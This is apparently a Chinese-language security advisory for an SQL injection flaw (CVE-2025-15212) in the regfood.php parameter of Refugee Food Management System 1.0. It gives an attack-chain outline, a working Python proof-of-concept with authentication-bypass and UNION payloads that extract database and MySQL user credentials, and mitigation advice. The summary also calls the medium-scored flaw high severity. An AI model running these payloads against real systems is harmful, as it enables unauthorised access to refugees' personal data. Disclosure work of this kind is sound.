CVE-2025-15212: Refugee Food Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15212

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Refugee Food Management System 1.0

漏洞概述

CVE-2025-15212是code-projects开源项目Refugee Food Management System 1.0版本中的一个高危SQL注入漏洞。该系统是一款用于管理难民食物供应的管理平台，由code-projects.org开发并提供免费下载。漏洞存在于系统的regfood.php文件中，具体影响了对参数a的未经过滤的用户输入处理。攻击者可以通过构造恶意的SQL语句，利用该漏洞绕过认证机制、获取数据库敏感信息，甚至在某些情况下实现远程代码执行。由于该漏洞的攻击复杂度较低（AC:L），且不需要高权限或用户交互，远程攻击者可以轻易利用此漏洞对系统造成危害。漏洞已于2025年12月30日公开披露，CVSS评分为6.3，属于中等严重程度。鉴于该系统可能部署在人道主义救援组织或相关政府机构中，漏洞的利用可能对难民救助工作产生严重影响。

技术细节

该SQL注入漏洞位于Refugee Food Management System的/home/regfood.php文件中的参数a处理逻辑中。攻击者可以通过HTTP请求向该端点发送精心构造的SQL payload来利用此漏洞。漏洞的根本原因在于应用程序未对用户输入进行充分的参数化查询或输入过滤，导致恶意SQL代码被直接拼接到数据库查询语句中。攻击者可以利用UNION SELECT、布尔盲注、时间盲注或报错注入等技术从数据库中提取敏感信息，包括用户凭证、配置文件信息、数据库结构等。由于该系统可能包含难民个人信息和食物分配记录等敏感数据，攻击成功可能导致严重的数据泄露后果。此外，攻击者还可能利用SQL注入漏洞进行进一步的内网渗透或获取服务器操作系统级别的访问权限。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的Refugee Food Management System 1.0，并定位到/home/regfood.php端点

STEP 2

步骤2

漏洞探测：攻击者使用SQL注入测试payload（如单引号、UNION SELECT等）验证参数a是否存在SQL注入漏洞

STEP 3

步骤3

认证绕过：利用' OR '1'='1等payload绕过登录认证机制，获取未授权访问权限

STEP 4

步骤4

数据提取：使用UNION注入或盲注技术从数据库中提取敏感信息，包括用户表、配置文件等

STEP 5

步骤5

权限提升：利用提取的凭据信息尝试获取管理员权限或进一步渗透系统

STEP 6

步骤6

持久化控制：在某些配置下，攻击者可能通过SQL注入写入Webshell，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15212 SQL Injection PoC
# Target: Refugee Food Management System 1.0
# Vulnerability: SQL Injection in /home/regfood.php parameter 'a'

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in regfood.php
    Args:
        target_url: Base URL of the vulnerable application
        payload: SQL injection payload
    Returns:
        Server response
    """
    target = f"{target_url}/home/regfood.php"
    params = {'a': payload}
    
    try:
        response = requests.get(target, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

# Basic authentication bypass payload
auth_bypass_payload = "' OR '1'='1"

# Database version extraction payload (MySQL)
database_version_payload = "' UNION SELECT NULL,@@version,NULL-- -"

# Extract current database
current_db_payload = "' UNION SELECT NULL,database(),NULL-- -"

# Extract users table (common SQL injection test)
users_payload = "' UNION SELECT NULL,CONCAT(user,':',password),NULL FROM mysql.user-- -"

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15212.py <target_url>")
        print("Example: python cve-2025-15212.py http://localhost/refugee-food-system")
        sys.exit(1)
    
    base_url = sys.argv[1].rstrip('/')
    
    print(f"[*] Testing CVE-2025-15212 on {base_url}")
    print(f"[*] Exploiting SQL injection in /home/regfood.php")
    
    # Test basic injection
    print("\n[+] Testing basic injection...")
    resp = exploit_sqli(base_url, auth_bypass_payload)
    print(f"Response length: {len(resp)}")
    
    # Extract database version
    print("\n[+] Extracting database version...")
    resp = exploit_sqli(base_url, database_version_payload)
    print(resp[:500] if len(resp) > 500 else resp)

影响范围

Refugee Food Management System 1.0

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 在Web服务器层面配置URL过滤规则，拦截包含可疑SQL关键字的请求；2) 对regfood.php文件实施访问控制，限制非授权用户访问；3) 启用数据库审计日志，监控异常查询行为；4) 使用ModSecurity等WAF工具添加针对SQL注入的防护规则；5) 临时下线受影响的系统功能，待漏洞修复后再重新启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15212
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15212
3 Details https://www.cvedetails.com/cve/CVE-2025-15212/
4 VulDB https://vuldb.com/cve/CVE-2025-15212
5 Link https://code-projects.org/
6 Link https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_regfood.php.md
7 Link https://vuldb.com/?ctiid.338596
8 Link https://vuldb.com/?id.338596
9 Link https://vuldb.com/?submit.722807
10 Link https://vuldb.com/?submit.724712